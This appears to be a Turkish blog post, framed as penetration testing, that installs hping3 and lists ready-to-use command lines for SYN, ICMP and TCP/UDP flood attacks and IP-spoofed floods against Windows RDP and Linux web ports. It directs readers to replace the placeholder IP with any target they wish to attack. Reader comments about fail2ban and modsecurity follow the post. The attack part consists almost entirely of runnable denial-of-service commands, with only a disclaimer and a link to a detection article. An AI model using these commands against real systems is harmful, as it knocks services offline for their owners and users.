2.216 defa okundu.

Penetration Testi İçin Saldırı Çeşitleri

Merhaba arkadaşlar, sizlere bu makalemde penetration testi için SYN, Flood, Spoof, UDP/TCP, ICMP ve DDoS Saldırısı konularından kısaca bahsedeceğim.

Penetration Testimizi Hping3 programı üzerinden gerçekleştireceğiz. Linux tabanlı sunucunuza kurulumu çok basittir. Kali Linux üzerinde geliyor. İlk öncelikle Hping3 programı indirme ve kurma işlemini anlatacağım.

Adım 1: Epel yüklemeniz olacaktır.

Epel yükleme işlemi için Epel makalemizden destek alabilirsiniz.

Adım 2: Hping3 Programı kurulumu

yum install hping3

Sıra Geldi Windows Sunucu Üzerinde Penetration Testi Yapmaya;

1) Flood ICMP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 3389 --flood 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -K --icmp-gw -K --icmp-addr
Yukarıda -p olarak verilen kısım atak yapacağınız port numarasını yazacaksınız. 192.168.1.5 olarak verilen ip yerine atak yapmak istediğiniz ip adresini yazmanız gerekmektedir. Diğer bir komut ise u1 komutu bu komut ise mikrosaniye içinde hedef ip gidecek atağa belirliyor.

Flood SYN;

SYN saldırısı (SYN flood), hizmeti engelleme saldırısının bir biçimidir. Bu saldırı biçiminde bir saldırgan sistemin yasal trafiğini isteklere cevap veremeyecek duruma getirmek için yeterli sunucu kaynaklarını tüketme girişiminde bulunarak, hedef alınan sisteme ardışık SYN istekleri (SYN requests) gönderir.
Kaynak: https://tr.wikipedia.org/wiki/SYN_saldırısı

2) Flood UDP/TCP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 3389 --flood 192.168.1.5 -o 64 -w 64 -d 64 -t 64 --tcp-timestamp

3) DDoS saldırısı Distributed Denial of Service attack

hping3 -i u1 -S -p 3389 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -c 64

Şimdi Sıra Linux Tabanlı Sunucular Üzerinde Penetration Testi Yapmaya Geldi;

1) Flood UDP/TCP Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 80 --flood 192.168.1.5 -o 64 -w 64 -c 64 -d 654 -t 64 --tcp-timestamp

Yukarıda -p olarak verilen kısım atak yapacağınız port numarasını yazacaksınız. 192.168.1.5 olarak verilen ip yerine atak yapmak istediğiniz ip adresini yazmanız gerekmektedir. Diğer bir komut ise u1 komutu bu komut ise mikrosaniye içinde hedef ip gidecek atağa belirliyor.

2) Flood UDP/TCP & Spoof Saldırısı (DDoS saldırısı Distributed Denial of Service attack).

hping3 -i u1 -S -p 80 --flood 192.168.1.5 -o 64 -w 64 -c 64 -d 654 -t 64 --tcp-timestamp -a 192.168.1.6

Spoof saldırısı;

IP spoofing en sık DoS(Denial of Service)saldırılarında kullanılır.Bu tür saldırılarda amaç, hedef bilgisayarın sorgu trafiğini aşırı miktarda artırmaktır, saldırgan saldırı paketlerine yanıt almayı önemsemez.Sahte adres kullanarak paket göndermek bu yüzden uygundur.Bu amaçlı saldırılar için ip spoofing’in ek avantajları vardır-Her sahte paket farklı bir adresten geliyormuş gibi görünür bu sebeple filtrelemek daha zordur,ve saldırının gerçek kaynağı gizlenir.
Kaynak: https://tr.wikipedia.org/wiki/IP_spoofing

3) DDoS & Spoof saldırısı Distributed Denial of Service attack

hping3 -i u1 -S -p 3389 192.168.1.5 -o 64 -w 64 -d 64 -t 64 -c 64 -a 192.168.1.6

Gelen saldırıların tespiti için aşağıdaki makalemiz üzerinden destek alabilirsiniz.

Netstat Nedir, Saldırı Nasıl Engellenir

Konu Hakkında Yazar ve Editör Tarafından Önemli Açıklama;

Yukarıda verilen bilgi tamamen Penetration testi için amaçlanmıştır. Saldırı tipleri ufak çaplı olarak yazılımış olup saldırı boyutu yükseltme veya saldırılar hakkında detaylı açıklama bulunmamaktadır. Sunucu veri güvenliği yükseltme ve atak yakalama tespiti için yazılmıştır. Konu hakkında CentOSBlog.net yönetimi olarak her hangi bir sorumluluk almamaktadır.

Bir Başka Makalede Görüşmek Üzere Hoşça Kalın 🙂

İbrahim Erdoğan

Alakasız içerikÇalışmıyorAradığım içerik ama eksikleri varÇalışıyorHarika (3 Oy verildi, Ortalama: 5,00 üzerinden 5)

8 thoughts on “Penetration Testi İçin Saldırı Çeşitleri

  1. yunus

    merhaba hocam centos için antivürüs yayınlarmısınız ücretsiz olursa çok iyi olur malted gibi

    Cevap
    1. ibrahim Yazar

      Konu hakkında yakında makalemiz yayınlanacaktır. Şuan penetration testinden başarılı olarak geçecek firewall kuralları üzerinde çalışmalarımız devam etmektedir.

      Cevap
      1. yunus

        plesk panel kullanıyorum içinde bayağı site yer alıyor birisi shell ile zarar verecek diye içimde korku var modesecurety +fail2ban adlı eklenti paylaşmıştınız onları kullanıyorum çok faydasını göremedim açıkcası %10 luk bir ram tüketimleri var bir proram varsa çok iyi olur teşkkürler

        Cevap
        1. ibrahim Yazar

          Sitemizde yapılan anlatımlar kendimizin test ettiği anlatımlardır. Anlatımlarda aşırı detay ve bilgi verilmemektedir. Konu hakkında profesyonel destek almanı tavsiye ederim. Size paylaştığımız bilgiler yüzeyseldir.

          Cevap
          1. yunus

            merhaba bu fail ban 2 bide modesecurity sizce ne kadar korur ne kadar iş görür bi bilginiz varmı

          2. ibrahim Yazar

            Fail2ban ve Modsecurity etkili olarak çalışmaktadır. Önemli olan kurallarıdır. Kurallar hakkında internetteki makaleleri incelemeni tavsiye ederim. Ancak bu konuda profesyonel destek alman daha etkin olacaktır. Comodo gibi profesyonel şirketlerden destek alman senin için daha güvenli olur.

sezer

yunus için bir cevap yazın Cevabı iptal et

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir